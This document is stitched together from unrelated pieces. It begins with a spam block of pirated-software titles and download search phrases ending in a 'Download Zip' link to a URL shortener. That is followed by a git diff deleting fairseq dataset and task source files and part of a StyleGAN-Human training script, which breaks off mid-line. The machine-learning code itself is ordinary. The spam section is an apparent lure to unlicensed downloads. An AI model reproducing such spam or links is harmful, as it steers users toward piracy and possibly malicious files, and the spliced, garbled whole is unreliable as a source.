Effects msn midtown madness 2 car downloads CdrLabel 7.1 cost to start awana s program Crazytalk Web Edition 5.0 download nichole nordeman Agogo Video To Zune Converter 7.2 lonley planet japan download VanDyke SecureFX 4.5.3 download underworld theatrical trailer ALTERA Max Plus II 10.2 joe egan out of nowhere download Employee Scheduling Assistant 2.1 montebello school district head start program Ashampoo Core Tuner 1.0 kohler replacement program with ferguson Xilisoft Media Toolkit Ultimate 5.0 gif89a export download WRQ Reflection Suite For X 12.0 mai hanano free download Adobe Lightroom 2.0 track and field 800meter training program Sateira CD DVD Burner 2.8 urban legends reference pages invitation virus Astonshell Aston 1.9 ericsson di 28 download for palm Realviz Matchmover Pro 4.0 joining self-insured programs Maxprog EMail Verifier 3.4 Multilingual lotro freebird abc download IK Multimedia Amplitube DX VST RTAS 1.3 canon elura drivers downloads Extensis Suitcase For Windows 11.0 Multilingual brian mcknight what s my name download FLV Recorder 3.0 canadian software retailers trend micro pc-cillin HTMLPower 3.8 rock of ages granite 3-p program Amara Flash Menu And Button Maker 2.0 saliva ladies and gentleman free download Laughingbird The Logo Creator MEGA Pak 5.0 globespan driver downloads DbQwikEdit 2.5.9.98 bullguard review bullguard download Gambit Mimic Virtual Lab CCNA 1.1 hack roots ost download Blaze Video Magic 3.0 s3 virge dx gx program Enfocus PitStop Professional 7.03 kaching sound download Cycling 74 Mode VSTi RTAS 1.2 evanescence farther away mp3 download Symantec Norton Antivirus 2005 dj hazard busted download Super Email Spider 2.71 micromedex pda download ArKaos VJ 3.6 FC3 download drawnings for wrought ironwork OraLobEditor 2.4 downloadable software for vivicam 55 Chart FX Developer Studio 1.0 cal lutheran undergraduate programs multimedia BlueFox Zune Video Converter 2.0 free download bonzi buddy Jaws PDF Creator 4.1 windows blinder free download Aplus DVD Creator kain and able hacking program Renaissance 2008 2.0 tha darkest day download Nerxy File Organizer 4.0 macintosh virus webscan Autodesk Design Review 2007 ipaq 3970 software desktop Kristanix Software Password Manager Deluxe 3.6 gendou downloads Gfx Creative Dimension 3Dsom Pro 2.0 polio dormant virus Polarity GX Stack Guitar Amplifier System VST 1.0 industrial pharmacy residency program AnzioWin 15.2 preschool programs freehold nj Magic Whiteboard 3.0 dvd43free download Microsoft AutoCollage 1.0 as-u-type download CyberMotion 3D-Designer 12.2 discounted mircosoft software Wise Package Studio Pro 7.0 i can t uninstall iolo antivirus Aleo Photo Collage Maker 1.5 delaware kids kare program BackRex Expert Backup 2.8 free samsung sgh-t629 software CyberLink PowerBackup 2.50 preschool program ymca tallahassee fl CoffeeCup Flash Button 7 freetar songs download VanDyke SecureFX 6.0 farsi for beginners download class MySuperSoft SuperVideoCap V5.4 plagirism software for webct 6.0 TuneBar 3.0 MAC free ocr-a font download Allok MOV Converter V2.3 services program manager tasks wbs sow Qpict 7.1 MAC free download reality jetstream SyncBackPro 5.1 download freddi fish DWGCreator 2006 2.0 wwf raw ring for mugen download Thinstall Virtualization Suite 3.3 weight watchers flex program cookbook ForkLift 1.0 MAC download california dreams for stepmania Magic Tweak V4.1 fill-in fall cil program FotoBatch 5.0 astrology software kerala malayalam Corel Paradox 9.0 brevard county schools teenage parent program Modelright Pro 3.0 advir virus Avex DVD Ripper 4.5 apprentiship programs in lacrosse DbConstructor 2.0 hixxy downloads Mercury Quicktest Professional 8.2 mac os 9.2 shockwave player download Omniquiti Lathe 1.5 ssid sniffer software Micro-Sys A1 Sitemap Generator 1.8 Multilingual claddagh wedding program covers MapInfo Professional 8.5 accelerated nursing program duluth TinkerTool 3.2 MAC lacie hardrive diagnostic program Steinberg Halion 3.1 civilization iv warlords fan scenarios download Anvsoft Flash Slideshow Maker Professional 4.7 eileen barton mp3 download Sothink DHTMLMenu 8.3 optus download meter FotoWare FotoStation Pro 5.2 Multilingual yi soon chin download Adobe Photoshop CS4 Extended 11.0 German download digimon saver evolution theme BayGenie EBay Auction Sniper Pro Edition 3.1 software documenation formats Adobe After Effects CS3 dbz buu saga episode downloads Writers Cafe 1.24 recruitmax software Adlib Express Enterprise Server 4 vtc javascript torrent download AutoFX Dreamsuite Series 2 For Adobe Photoshop CS2 cognex pc host software Ejay Techno 4 download rapidharvest AcroPlot Pro 2008 2.13 sony dsc-v3 driver downloads Shadow Defender 1.0 apcalc programs Net Control 2 7.0 pureedge viewer download Color7 Music Editor 6.3 dentrix dental software DownloadStudio 5.0 download i8042prt driver West Wind Web Monitor 3.3 naruto chapter 352 download DriverMax 4.5 bailamos remix download Secure Archive 1.0 lost dutchmans gold free download game CryptoExpert 2007 Professional 7.0 mismanagement aid program in western sahara Jasc WebDraw 1.0 cavalier workshop manual download Sonoma Wire Works Sonoma 7 VST 1.1 razr 3t software IView MediaPro 2.5 MAC download dragonball gt to visualboyadvance NTI Drive Backup Deluxe 4.0 john dodge guitarist program director SWISH 2.0 motorcycle learners permit book download Microsoft Windows Server 2003 Enterprise 64 Bit X64 download winsip CONCEIVA ConvertHQ 1.1 dvd cover download rise of taj Acme CADSee 4.9 download a craftsman pride for sims2 Sisoftware Sandra Professional 2007 Sp1 colors with ken nordine program Flaming Pear India Ink 1.97 For Adobe Photoshop download anemone by lynch RISA 3D 6.0 h-anime download Imagineer Systems Monet 2.1.2 behringer v-amp download FireDaemon Pro 1.9 default download directory for ppc-6700 Okoker Iso Maker 6.9 free download paintbrush 2.20 TingleSoft PSP Converter 1.8 scandisk download freeware pst IsoBuster Pro 2.3 serum hemagglutinin inhibition west nile virus Kingdia DVD Ripper 3.0 motherfuckers timberlake sexy back download Ashlar Vellum Argon 8.2 betterpropaganda free mp downloads SensorsView Pro 3.1 c64 boulderdash download Motorola Mobile Phonetools Deluxe 4.0 hgo ch software Techexcel Helpdesk V5.5 sierra wireless aircard 860 software Imagenomic Portraiture 1.0 For Adobe Photoshop minnesota woman download 2207 YouTube FLV To AVI Suite Enerprise 2.3 muzzy and language programs for kids NCSS And PASS 2008 V8.0.2 fedora 7 moonshine download LinPlug Saxlab VSTi 1.0 download book talented mr ripley DocRepair 2.20.0720 american idol staying alive download Gael MindGenius Business 2005 2.11 neopost software issues ImTOO IPhone Video Converter 3.1 asg software management business cmdb service Pepakura Designer 2.1.6 muay thai strength and conditioning program Babylon 7.5 sca herald software device KS-Soft Advanced Host Monitor 7.7 idaho departmnt of corrections lifeline program Flash Player Pro 3.6 download poppet VIP Organizer 2.9 oclc record won t download MProjector 3.1 creps program Corel Paint Shop Pro Photo X2 12.0 Multilingual emergency management software castlerock RGBmachine 3.6 pasco county vocational rehabilitation women s program Blumentals Rapid HTMLPad 2007 V8.0 download kakashi gaiden Avanquest MyLogo Maker Professional 2.0 amazon s video download service unmasked Auto Power-on Shut-down 2.0 download sysclean Raize Components 5.0 free printer spooler download PrepLogic CompTIA N10-003 Practice Exams 3.1 guns madagascar leak download GetFLV Pro 5.0 dores add program Bar Code Pro 6.0 MAC sloop script font free download Adobe Illustrator CS4 free sharp gx30i suite download Coade Cadworx Plant Pro 2008 wmatch 2 download Intel Thread Profiler 3.1

          -

          netapp data ontap simulator 8 1.19


          Download Ziphttps://urlgoal.com/2uyM4r



          aaccfb2cb3
          -
          -
          \ No newline at end of file diff --git a/spaces/gradio/HuBERT/fairseq/data/pad_dataset.py b/spaces/gradio/HuBERT/fairseq/data/pad_dataset.py deleted file mode 100644 index 8075bba6a9efc5f8421368ee0b2ae66afe3f5009..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/data/pad_dataset.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from fairseq.data import data_utils - -from . import BaseWrapperDataset - - -class PadDataset(BaseWrapperDataset): - def __init__(self, dataset, pad_idx, left_pad): - super().__init__(dataset) - self.pad_idx = pad_idx - self.left_pad = left_pad - - def collater(self, samples): - return data_utils.collate_tokens(samples, self.pad_idx, left_pad=self.left_pad) - - -class LeftPadDataset(PadDataset): - def __init__(self, dataset, pad_idx): - super().__init__(dataset, pad_idx, left_pad=True) - - -class RightPadDataset(PadDataset): - def __init__(self, dataset, pad_idx): - super().__init__(dataset, pad_idx, left_pad=False) diff --git a/spaces/gradio/HuBERT/fairseq/tasks/fairseq_task.py b/spaces/gradio/HuBERT/fairseq/tasks/fairseq_task.py deleted file mode 100644 index fbec9bb2a557e97cb921b705846bde482d85f169..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/tasks/fairseq_task.py +++ /dev/null @@ -1,677 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import os -import warnings -from argparse import Namespace -from typing import Any, Callable, Dict, List - -import torch -from fairseq import metrics, search, tokenizer, utils -from fairseq.data import Dictionary, FairseqDataset, data_utils, encoders, iterators -from fairseq.dataclass import FairseqDataclass -from fairseq.dataclass.utils import gen_parser_from_dataclass -from fairseq.optim.amp_optimizer import AMPOptimizer -from omegaconf import DictConfig - - -logger = logging.getLogger(__name__) - - -class StatefulContainer(object): - - _state: Dict[str, Any] = dict() - _factories: Dict[str, Callable[[], Any]] = dict() - - def add_factory(self, name, factory: Callable[[], Any]): - self._factories[name] = factory - - def merge_state_dict(self, state_dict: Dict[str, Any]): - self._state.update(state_dict) - - @property - def state_dict(self) -> Dict[str, Any]: - return self._state - - def __getattr__(self, name): - if name not in self._state and name in self._factories: - self._state[name] = self._factories[name]() - - if name in self._state: - return self._state[name] - - raise AttributeError(f"Task state has no factory for attribute {name}") - - -class FairseqTask(object): - """ - Tasks store dictionaries and provide helpers for loading/iterating over - Datasets, initializing the Model/Criterion and calculating the loss. - - Tasks have limited statefulness. In particular, state that needs to be - saved to/loaded from checkpoints needs to be stored in the `self.state` - :class:`StatefulContainer` object. For example:: - - self.state.add_factory("dictionary", self.load_dictionary) - print(self.state.dictionary) # calls self.load_dictionary() - - This is necessary so that when loading checkpoints, we can properly - recreate the task state after initializing the task instance. - """ - - @classmethod - def add_args(cls, parser): - """Add task-specific arguments to the parser.""" - dc = getattr(cls, "__dataclass", None) - if dc is not None: - gen_parser_from_dataclass(parser, dc()) - - @staticmethod - def logging_outputs_can_be_summed(criterion) -> bool: - """ - Whether the logging outputs returned by `train_step` and `valid_step` can - be summed across workers prior to calling `aggregate_logging_outputs`. - Setting this to True will improves distributed training speed. - """ - return criterion.logging_outputs_can_be_summed() - - cfg: FairseqDataclass - datasets: Dict[str, FairseqDataset] - dataset_to_epoch_iter: Dict[FairseqDataset, Any] - state: StatefulContainer = None - - def __init__(self, cfg: FairseqDataclass, **kwargs): - self.cfg = cfg - self.datasets = dict() - self.dataset_to_epoch_iter = dict() - self.state = StatefulContainer() - - @classmethod - def load_dictionary(cls, filename): - """Load the dictionary from the filename - - Args: - filename (str): the filename - """ - return Dictionary.load(filename) - - @classmethod - def build_dictionary( - cls, filenames, workers=1, threshold=-1, nwords=-1, padding_factor=8 - ): - """Build the dictionary - - Args: - filenames (list): list of filenames - workers (int): number of concurrent workers - threshold (int): defines the minimum word count - nwords (int): defines the total number of words in the final dictionary, - including special symbols - padding_factor (int): can be used to pad the dictionary size to be a - multiple of 8, which is important on some hardware (e.g., Nvidia - Tensor Cores). - """ - d = Dictionary() - for filename in filenames: - Dictionary.add_file_to_dictionary( - filename, d, tokenizer.tokenize_line, workers - ) - d.finalize(threshold=threshold, nwords=nwords, padding_factor=padding_factor) - return d - - @classmethod - def setup_task(cls, cfg: DictConfig, **kwargs): - """Setup the task (e.g., load dictionaries). - - Args: - cfg (omegaconf.DictConfig): parsed command-line arguments - """ - return cls(cfg, **kwargs) - - def has_sharded_data(self, split): - return os.pathsep in getattr(self.cfg, "data", "") - - def load_dataset( - self, - split: str, - combine: bool = False, - task_cfg: FairseqDataclass = None, - **kwargs - ): - """Load a given dataset split. - - Args: - split (str): name of the split (e.g., train, valid, test) - combine (bool): combines a split segmented into pieces into one dataset - task_cfg (FairseqDataclass): optional task configuration stored in the checkpoint that can be used - to load datasets - """ - raise NotImplementedError - - def dataset(self, split): - """ - Return a loaded dataset split. - - Args: - split (str): name of the split (e.g., train, valid, test) - - Returns: - a :class:`~fairseq.data.FairseqDataset` corresponding to *split* - """ - from fairseq.data import FairseqDataset - - if split not in self.datasets: - raise KeyError("Dataset not loaded: " + split) - if not isinstance(self.datasets[split], FairseqDataset): - raise TypeError("Datasets are expected to be of type FairseqDataset") - return self.datasets[split] - - def filter_indices_by_size( - self, indices, dataset, max_positions=None, ignore_invalid_inputs=False - ): - """ - Filter examples that are too large - - Args: - indices (np.array): original array of sample indices - dataset (~fairseq.data.FairseqDataset): dataset to batch - max_positions (optional): max sentence length supported by the - model (default: None). - ignore_invalid_inputs (bool, optional): don't raise Exception for - sentences that are too long (default: False). - Returns: - np.array: array of filtered sample indices - """ - indices, ignored = dataset.filter_indices_by_size(indices, max_positions) - if len(ignored) > 0: - if not ignore_invalid_inputs: - raise Exception( - ( - "Size of sample #{} is invalid (={}) since max_positions={}, " - "skip this example with --skip-invalid-size-inputs-valid-test" - ).format(ignored[0], dataset.size(ignored[0]), max_positions) - ) - logger.warning( - ( - "{:,} samples have invalid sizes and will be skipped, " - "max_positions={}, first few sample ids={}" - ).format(len(ignored), max_positions, ignored[:10]) - ) - return indices - - def can_reuse_epoch_itr(self, dataset): - # We can reuse the epoch iterator across epochs as long as the dataset - # hasn't disabled it. We default to ``False`` here, although in practice - # this will be ``True`` for most datasets that inherit from - # ``FairseqDataset`` due to the base implementation there. - return getattr(dataset, "can_reuse_epoch_itr_across_epochs", False) - - def get_batch_iterator( - self, - dataset, - max_tokens=None, - max_sentences=None, - max_positions=None, - ignore_invalid_inputs=False, - required_batch_size_multiple=1, - seed=1, - num_shards=1, - shard_id=0, - num_workers=0, - epoch=1, - data_buffer_size=0, - disable_iterator_cache=False, - ): - """ - Get an iterator that yields batches of data from the given dataset. - - Args: - dataset (~fairseq.data.FairseqDataset): dataset to batch - max_tokens (int, optional): max number of tokens in each batch - (default: None). - max_sentences (int, optional): max number of sentences in each - batch (default: None). - max_positions (optional): max sentence length supported by the - model (default: None). - ignore_invalid_inputs (bool, optional): don't raise Exception for - sentences that are too long (default: False). - required_batch_size_multiple (int, optional): require batch size to - be a multiple of N (default: 1). - seed (int, optional): seed for random number generator for - reproducibility (default: 1). - num_shards (int, optional): shard the data iterator into N - shards (default: 1). - shard_id (int, optional): which shard of the data iterator to - return (default: 0). - num_workers (int, optional): how many subprocesses to use for data - loading. 0 means the data will be loaded in the main process - (default: 0). - epoch (int, optional): the epoch to start the iterator from - (default: 1). - data_buffer_size (int, optional): number of batches to - preload (default: 0). - disable_iterator_cache (bool, optional): don't cache the - EpochBatchIterator (ignores `FairseqTask::can_reuse_epoch_itr`) - (default: False). - Returns: - ~fairseq.iterators.EpochBatchIterator: a batched iterator over the - given dataset split - """ - can_reuse_epoch_itr = not disable_iterator_cache and self.can_reuse_epoch_itr( - dataset - ) - if can_reuse_epoch_itr and dataset in self.dataset_to_epoch_iter: - logger.debug("reusing EpochBatchIterator for epoch {}".format(epoch)) - return self.dataset_to_epoch_iter[dataset] - - assert isinstance(dataset, FairseqDataset) - - # initialize the dataset with the correct starting epoch - dataset.set_epoch(epoch) - - # get indices ordered by example size - with data_utils.numpy_seed(seed): - indices = dataset.ordered_indices() - - # filter examples that are too large - if max_positions is not None: - indices = self.filter_indices_by_size( - indices, dataset, max_positions, ignore_invalid_inputs - ) - - # create mini-batches with given size constraints - batch_sampler = dataset.batch_by_size( - indices, - max_tokens=max_tokens, - max_sentences=max_sentences, - required_batch_size_multiple=required_batch_size_multiple, - ) - - # return a reusable, sharded iterator - epoch_iter = iterators.EpochBatchIterator( - dataset=dataset, - collate_fn=dataset.collater, - batch_sampler=batch_sampler, - seed=seed, - num_shards=num_shards, - shard_id=shard_id, - num_workers=num_workers, - epoch=epoch, - buffer_size=data_buffer_size, - ) - - if can_reuse_epoch_itr: - self.dataset_to_epoch_iter[dataset] = epoch_iter - - return epoch_iter - - def build_model(self, cfg: FairseqDataclass): - """ - Build the :class:`~fairseq.models.BaseFairseqModel` instance for this - task. - - Args: - cfg (FairseqDataclass): configuration object - - Returns: - a :class:`~fairseq.models.BaseFairseqModel` instance - """ - from fairseq import models, quantization_utils - - model = models.build_model(cfg, self) - model = quantization_utils.quantize_model_scalar(model, cfg) - return model - - def build_criterion(self, cfg: DictConfig): - """ - Build the :class:`~fairseq.criterions.FairseqCriterion` instance for - this task. - - Args: - cfg (omegaconf.DictConfig): configration object - - Returns: - a :class:`~fairseq.criterions.FairseqCriterion` instance - """ - from fairseq import criterions - - return criterions.build_criterion(cfg, self) - - def build_generator( - self, models, args, seq_gen_cls=None, extra_gen_cls_kwargs=None, prefix_allowed_tokens_fn=None, - ): - """ - Build a :class:`~fairseq.SequenceGenerator` instance for this - task. - - Args: - models (List[~fairseq.models.FairseqModel]): ensemble of models - args (fairseq.dataclass.configs.GenerationConfig): - configuration object (dataclass) for generation - extra_gen_cls_kwargs (Dict[str, Any]): extra options to pass - through to SequenceGenerator - prefix_allowed_tokens_fn (Callable[[int, torch.Tensor], List[int]]): - If provided, this function constrains the beam search to - allowed tokens only at each step. The provided function - should take 2 arguments: the batch ID (`batch_id: int`) - and a unidimensional tensor of token ids (`inputs_ids: - torch.Tensor`). It has to return a `List[int]` with the - allowed tokens for the next generation step conditioned - on the previously generated tokens (`inputs_ids`) and - the batch ID (`batch_id`). This argument is useful for - constrained generation conditioned on the prefix, as - described in "Autoregressive Entity Retrieval" - (https://arxiv.org/abs/2010.00904) and - https://github.com/facebookresearch/GENRE. - """ - if getattr(args, "score_reference", False): - from fairseq.sequence_scorer import SequenceScorer - - return SequenceScorer( - self.target_dictionary, - compute_alignment=getattr(args, "print_alignment", False), - ) - - from fairseq.sequence_generator import ( - SequenceGenerator, - SequenceGeneratorWithAlignment, - ) - try: - from fairseq.fb_sequence_generator import FBSequenceGenerator - except ModuleNotFoundError: - pass - - # Choose search strategy. Defaults to Beam Search. - sampling = getattr(args, "sampling", False) - sampling_topk = getattr(args, "sampling_topk", -1) - sampling_topp = getattr(args, "sampling_topp", -1.0) - diverse_beam_groups = getattr(args, "diverse_beam_groups", -1) - diverse_beam_strength = getattr(args, "diverse_beam_strength", 0.5) - match_source_len = getattr(args, "match_source_len", False) - diversity_rate = getattr(args, "diversity_rate", -1) - constrained = getattr(args, "constraints", False) - if prefix_allowed_tokens_fn is None: - prefix_allowed_tokens_fn = getattr(args, "prefix_allowed_tokens_fn", None) - if ( - sum( - int(cond) - for cond in [ - sampling, - diverse_beam_groups > 0, - match_source_len, - diversity_rate > 0, - ] - ) - > 1 - ): - raise ValueError("Provided Search parameters are mutually exclusive.") - assert sampling_topk < 0 or sampling, "--sampling-topk requires --sampling" - assert sampling_topp < 0 or sampling, "--sampling-topp requires --sampling" - - if sampling: - search_strategy = search.Sampling( - self.target_dictionary, sampling_topk, sampling_topp - ) - elif diverse_beam_groups > 0: - search_strategy = search.DiverseBeamSearch( - self.target_dictionary, diverse_beam_groups, diverse_beam_strength - ) - elif match_source_len: - # this is useful for tagging applications where the output - # length should match the input length, so we hardcode the - # length constraints for simplicity - search_strategy = search.LengthConstrainedBeamSearch( - self.target_dictionary, - min_len_a=1, - min_len_b=0, - max_len_a=1, - max_len_b=0, - ) - elif diversity_rate > -1: - search_strategy = search.DiverseSiblingsSearch( - self.target_dictionary, diversity_rate - ) - elif constrained: - search_strategy = search.LexicallyConstrainedBeamSearch( - self.target_dictionary, args.constraints - ) - elif prefix_allowed_tokens_fn: - search_strategy = search.PrefixConstrainedBeamSearch( - self.target_dictionary, prefix_allowed_tokens_fn - ) - else: - search_strategy = search.BeamSearch(self.target_dictionary) - - extra_gen_cls_kwargs = extra_gen_cls_kwargs or {} - if seq_gen_cls is None: - if getattr(args, "print_alignment", False): - seq_gen_cls = SequenceGeneratorWithAlignment - extra_gen_cls_kwargs["print_alignment"] = args.print_alignment - elif getattr(args, "fb_seq_gen", False): - seq_gen_cls = FBSequenceGenerator - else: - seq_gen_cls = SequenceGenerator - - return seq_gen_cls( - models, - self.target_dictionary, - beam_size=getattr(args, "beam", 5), - max_len_a=getattr(args, "max_len_a", 0), - max_len_b=getattr(args, "max_len_b", 200), - min_len=getattr(args, "min_len", 1), - normalize_scores=(not getattr(args, "unnormalized", False)), - len_penalty=getattr(args, "lenpen", 1), - unk_penalty=getattr(args, "unkpen", 0), - temperature=getattr(args, "temperature", 1.0), - match_source_len=getattr(args, "match_source_len", False), - no_repeat_ngram_size=getattr(args, "no_repeat_ngram_size", 0), - search_strategy=search_strategy, - **extra_gen_cls_kwargs, - ) - - def train_step( - self, sample, model, criterion, optimizer, update_num, ignore_grad=False - ): - """ - Do forward and backward, and return the loss as computed by *criterion* - for the given *model* and *sample*. - - Args: - sample (dict): the mini-batch. The format is defined by the - :class:`~fairseq.data.FairseqDataset`. - model (~fairseq.models.BaseFairseqModel): the model - criterion (~fairseq.criterions.FairseqCriterion): the criterion - optimizer (~fairseq.optim.FairseqOptimizer): the optimizer - update_num (int): the current update - ignore_grad (bool): multiply loss by 0 if this is set to True - - Returns: - tuple: - - the loss - - the sample size, which is used as the denominator for the - gradient - - logging outputs to display while training - """ - model.train() - model.set_num_updates(update_num) - with torch.autograd.profiler.record_function("forward"): - with torch.cuda.amp.autocast(enabled=(isinstance(optimizer, AMPOptimizer))): - loss, sample_size, logging_output = criterion(model, sample) - if ignore_grad: - loss *= 0 - with torch.autograd.profiler.record_function("backward"): - optimizer.backward(loss) - return loss, sample_size, logging_output - - def valid_step(self, sample, model, criterion): - model.eval() - with torch.no_grad(): - loss, sample_size, logging_output = criterion(model, sample) - return loss, sample_size, logging_output - - def optimizer_step(self, optimizer, model, update_num): - optimizer.step() - - def build_dataset_for_inference( - self, src_tokens: List[torch.Tensor], src_lengths: List[int], **kwargs - ) -> torch.utils.data.Dataset: - raise NotImplementedError - - def inference_step( - self, generator, models, sample, prefix_tokens=None, constraints=None - ): - with torch.no_grad(): - return generator.generate( - models, sample, prefix_tokens=prefix_tokens, constraints=constraints - ) - - def begin_epoch(self, epoch, model): - """Hook function called before the start of each epoch.""" - pass - - def begin_valid_epoch(self, epoch, model): - """Hook function called before the start of each validation epoch.""" - pass - - def aggregate_logging_outputs(self, logging_outputs, criterion): - """[deprecated] Aggregate logging outputs from data parallel training.""" - utils.deprecation_warning( - "The aggregate_logging_outputs API is deprecated. " - "Please use the reduce_metrics API instead." - ) - with metrics.aggregate() as agg: - self.reduce_metrics(logging_outputs, criterion) - return agg.get_smoothed_values() - - def reduce_metrics(self, logging_outputs, criterion): - """Aggregate logging outputs from data parallel training.""" - # backward compatibility for tasks that override aggregate_logging_outputs - base_func = FairseqTask.aggregate_logging_outputs - self_func = getattr(self, "aggregate_logging_outputs").__func__ - if self_func is not base_func: - utils.deprecation_warning( - "Tasks should implement the reduce_metrics API. " - "Falling back to deprecated aggregate_logging_outputs API." - ) - agg_logging_outputs = self.aggregate_logging_outputs( - logging_outputs, criterion - ) - for k, v in agg_logging_outputs.items(): - metrics.log_scalar(k, v) - return - - if not any("ntokens" in log for log in logging_outputs): - warnings.warn( - "ntokens not found in Criterion logging outputs, cannot log wpb or wps" - ) - else: - ntokens = sum(log.get("ntokens", 0) for log in logging_outputs) - metrics.log_scalar("wpb", ntokens, priority=180, round=1) - metrics.log_speed("wps", ntokens, priority=90, round=1) - - if not any("nsentences" in log for log in logging_outputs): - warnings.warn( - "nsentences not found in Criterion logging outputs, cannot log bsz" - ) - else: - nsentences = sum(log.get("nsentences", 0) for log in logging_outputs) - metrics.log_scalar("bsz", nsentences, priority=190, round=1) - - criterion.__class__.reduce_metrics(logging_outputs) - - def state_dict(self): - if self.state is not None: - return self.state.state_dict - return {} - - def load_state_dict(self, state_dict: Dict[str, Any]): - if self.state is not None: - self.state.merge_state_dict(state_dict) - - def max_positions(self): - """Return the max input length allowed by the task.""" - return None - - @property - def source_dictionary(self): - """Return the source :class:`~fairseq.data.Dictionary` (if applicable - for this task).""" - raise NotImplementedError - - @property - def target_dictionary(self): - """Return the target :class:`~fairseq.data.Dictionary` (if applicable - for this task).""" - raise NotImplementedError - - def build_tokenizer(self, args): - """Build the pre-tokenizer for this task.""" - return encoders.build_tokenizer(args) - - def build_bpe(self, args): - """Build the tokenizer for this task.""" - return encoders.build_bpe(args) - - def get_interactive_tokens_and_lengths(self, lines, encode_fn): - tokens = [ - self.source_dictionary.encode_line( - encode_fn(src_str), add_if_not_exist=False - ).long() - for src_str in lines - ] - lengths = [t.numel() for t in tokens] - return tokens, lengths - - -class LegacyFairseqTask(FairseqTask): - def __init__(self, args: Namespace): - self.args = args - self.datasets = {} - self.dataset_to_epoch_iter = {} - - @classmethod - def setup_task(cls, args: Namespace, **kwargs): - """Setup the task (e.g., load dictionaries). - - Args: - args (argparse.Namespace): parsed command-line arguments - """ - return cls(args, **kwargs) - - def has_sharded_data(self, split): - return os.pathsep in getattr(self.args, "data", "") - - def build_model(self, args: Namespace): - """ - Build the :class:`~fairseq.models.BaseFairseqModel` instance for this - task. - - Args: - args (argparse.Namespace): parsed command-line arguments - - Returns: - a :class:`~fairseq.models.BaseFairseqModel` instance - """ - from fairseq import models, quantization_utils - - model = models.build_model(args, self) - model = quantization_utils.quantize_model_scalar(model, args) - return model - - def build_criterion(self, args: Namespace): - """ - Build the :class:`~fairseq.criterions.FairseqCriterion` instance for - this task. - - Args: - args (argparse.Namespace): parsed command-line arguments - - Returns: - a :class:`~fairseq.criterions.FairseqCriterion` instance - """ - from fairseq import criterions - - return criterions.build_criterion(args, self) diff --git a/spaces/gyugnsu/DragGan-Inversion/stylegan_human/training_scripts/sg2/train.py b/spaces/gyugnsu/DragGan-Inversion/stylegan_human/training_scripts/sg2/train.py deleted file mode 100644 index 74d016a65caedb70806c490b6ebbcad665de51b9..0000000000000000000000000000000000000000 --- a/spaces/gyugnsu/DragGan-Inversion/stylegan_human/training_scripts/sg2/train.py +++ /dev/null @@ -1,589 +0,0 @@ -# Copyright (c) SenseTime Research. All rights reserved. - -# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Train a GAN using the techniques described in the paper -"Training Generative Adversarial Networks with Limited Data".""" - -import os -import click -import re -import json -import tempfile -import torch -import dnnlib - -import ast -from training import training_loop -from metrics import metric_main -from torch_utils import training_stats -from torch_utils import custom_ops - -# ---------------------------------------------------------------------------- - - -class UserError(Exception): - pass - -# ---------------------------------------------------------------------------- - - -def setup_training_loop_kwargs( - # General options (not included in desc). - gpus=None, # Number of GPUs: , default = 1 gpu - snap=None, # Snapshot interval: , default = 50 ticks - metrics=None, # List of metric names: [], ['fid50k_full'] (default), ... - seed=None, # Random seed: , default = 0 - - # Dataset. - data=None, # Training dataset (required): - cond=None, # Train conditional model based on dataset labels: , default = False - subset=None, # Train with only N images: , default = all - mirror=None, # Augment dataset with x-flips: , default = False - square=None, - - # Base config. - # Base config: 'auto' (default), 'stylegan2', 'paper256', 'paper512', 'paper1024', 'cifar', 'shhq' - cfg=None, - gamma=None, # Override R1 gamma: - kimg=None, # Override training duration: - batch=None, # Override batch size: - - # Discriminator augmentation. - aug=None, # Augmentation mode: 'ada' (default), 'noaug', 'fixed' - p=None, # Specify p for 'fixed' (required): - target=None, # Override ADA target for 'ada': , default = depends on aug - # Augmentation pipeline: 'blit', 'geom', 'color', 'filter', 'noise', 'cutout', 'bg', 'bgc' (default), ..., 'bgcfnc' - augpipe=None, - - # Transfer learning. - # Load previous network: 'noresume' (default), 'ffhq256', 'ffhq512', 'ffhq1024', 'celebahq256', 'lsundog256', , - resume=None, - freezed=None, # Freeze-D: , default = 0 discriminator layers - - # Performance options (not included in desc). - fp32=None, # Disable mixed-precision training: , default = False - nhwc=None, # Use NHWC memory format with FP16: , default = False - # Allow PyTorch to use TF32 for matmul and convolutions: , default = False - allow_tf32=None, - nobench=None, # Disable cuDNN benchmarking: , default = False - workers=None, # Override number of DataLoader workers: , default = 3 - -): - args = dnnlib.EasyDict() - - # ------------------------------------------ - # General options: gpus, snap, metrics, seed - # ------------------------------------------ - - if gpus is None: - gpus = 1 - assert isinstance(gpus, int) - if not (gpus >= 1 and gpus & (gpus - 1) == 0): - raise UserError('--gpus must be a power of two') - args.num_gpus = gpus - - if snap is None: - snap = 50 - assert isinstance(snap, int) - if snap < 1: - raise UserError('--snap must be at least 1') - args.image_snapshot_ticks = snap - args.network_snapshot_ticks = snap - - if metrics is None: - metrics = ['fid50k_full'] - assert isinstance(metrics, list) - if not all(metric_main.is_valid_metric(metric) for metric in metrics): - raise UserError('\n'.join( - ['--metrics can only contain the following values:'] + metric_main.list_valid_metrics())) - args.metrics = metrics - - if seed is None: - seed = 0 - assert isinstance(seed, int) - args.random_seed = seed - - # ------------------------------------------- - # Dataset: data, cond, subset, mirror, square - # ------------------------------------------- - - print('square : ', square) - - assert data is not None - assert isinstance(data, str) - - args.training_set_kwargs = dnnlib.EasyDict( - class_name='training.dataset.ImageFolderDataset', path=data, use_labels=True, max_size=None, xflip=False, square=square) - args.data_loader_kwargs = dnnlib.EasyDict( - pin_memory=True, num_workers=3, prefetch_factor=2) - try: - training_set = dnnlib.util.construct_class_by_name( - **args.training_set_kwargs) # subclass of training.dataset.Dataset - # be explicit about resolution - args.training_set_kwargs.resolution = training_set.resolution - # be explicit about labels - args.training_set_kwargs.use_labels = training_set.has_labels - args.training_set_kwargs.max_size = len( - training_set) # be explicit about dataset size - desc = 